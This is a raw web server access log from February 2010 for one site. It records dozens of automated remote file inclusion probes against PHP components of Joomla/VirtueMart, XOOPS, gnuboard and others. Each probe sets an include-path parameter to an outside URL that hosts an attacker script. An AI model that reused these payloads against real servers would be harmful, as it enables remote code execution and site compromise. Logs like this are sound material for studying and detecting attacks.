96.9.29.2 - - [15/Feb/2010:00:29:16 -0800] "GET /logs/access_091221.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:29:17 -0800] "GET /write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:29:17 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:29:17 -0800] "GET /logs//write_update.php?board_skin_path=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [15/Feb/2010:00:29:39 -0800] "GET /write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [15/Feb/2010:00:29:39 -0800] "GET /logs/access_100201.log//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [15/Feb/2010:00:29:39 -0800] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [15/Feb/2010:00:29:42 -0800] "GET /write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [15/Feb/2010:00:29:42 -0800] "GET /logs/access_100201.log//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [15/Feb/2010:00:29:42 -0800] "GET /logs//write_update.php?board_skin_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:29:44 -0800] "GET /logs/access_091012.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:29:47 -0800] "GET /logs/access_090831.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:29:48 -0800] "GET /logs/access_091012.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:29:51 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:29:51 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:29:53 -0800] "GET /logs/access_091012.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:00:29:57 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:00:29:57 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:00:29:57 -0800] "GET /logs/access_100201.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:30:33 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:30:38 -0800] "GET /logs/access_100125.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:30:40 -0800] "GET /logs/access_090831.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [15/Feb/2010:00:30:48 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [15/Feb/2010:00:30:48 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [15/Feb/2010:00:30:48 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:00:30:49 -0800] "GET /logs/access_100125.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:30:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:30:50 -0800] "GET /logs/access_091116.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:30:50 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [15/Feb/2010:00:30:58 -0800] "GET /logs/access_091228.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:31:04 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:31:05 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:31:15 -0800] "GET /logs/access_091116.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:31:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:31:15 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:31:23 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:31:29 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:31:45 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:00:31:48 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_sef&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:00:31:50 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_sef&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:32:11 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:14 -0800] "GET /logs/access_091221.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:14 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:14 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:23 -0800] "GET /logs/access_091221.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:23 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:23 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:00:32:33 -0800] "GET /logs/access_091026.log%20%20//index.php?option=com_sef&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:39 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:39 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:32:39 -0800] "GET /logs/access_091221.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:00:32:48 -0800] "GET /logs/access_091026.log%20%20//index.php?option=com_sef&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:00:34:33 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:00:34:33 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:00:34:33 -0800] "GET /logs/access_100201.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:35:51 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:35:51 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:35:51 -0800] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:36:00 -0800] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:36:00 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:36:00 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:36:48 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:36:49 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:00:37:22 -0800] "GET /logs/access_090713.log//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:37:57 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:37:57 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:37:57 -0800] "GET /logs/access_091228.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:38:09 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:38:09 -0800] "GET /logs/access_091228.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
187.45.193.155 - - [15/Feb/2010:00:38:09 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:00:38:09 -0800] "GET /logs/access_100111.log//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:38:24 -0800] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:38:24 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:38:24 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:40:34 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:40:34 -0800] "GET /logs/access_091123.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:40:34 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [15/Feb/2010:00:42:36 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [15/Feb/2010:00:42:36 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [15/Feb/2010:00:42:40 -0800] "GET /logs/access_100111.log/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [15/Feb/2010:00:42:42 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [15/Feb/2010:00:42:42 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [15/Feb/2010:00:42:47 -0800] "GET /logs/access_100111.log/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:42:54 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:42:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:42:59 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
212.241.177.123 - - [15/Feb/2010:00:44:08 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [15/Feb/2010:00:44:08 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.241.177.123 - - [15/Feb/2010:00:44:08 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [15/Feb/2010:00:44:18 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [15/Feb/2010:00:44:18 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [15/Feb/2010:00:44:18 -0800] "GET /logs/access_100125.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:45:19 -0800] "GET /bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:45:19 -0800] "GET /logs//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:45:19 -0800] "GET /logs/access_100201.log%20%20//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:45:30 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php//gnuboard4//bbs/write_update.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:00:45:47 -0800] "GET /logs/access_100118.log//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [15/Feb/2010:00:48:57 -0800] "GET /logs/access_090907.log//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [15/Feb/2010:00:48:57 -0800] "GET /logs/access_090713.log//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [15/Feb/2010:00:48:57 -0800] "GET /modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [15/Feb/2010:00:48:57 -0800] "GET /logs//modules/xoopsgallery/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:49:08 -0800] "GET /logs/access.log%20%20///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:49:08 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [15/Feb/2010:00:49:08 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [15/Feb/2010:00:49:22 -0800] "GET /logs/error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [15/Feb/2010:00:49:22 -0800] "GET /logs/access.log/error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [15/Feb/2010:00:49:22 -0800] "GET /error.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
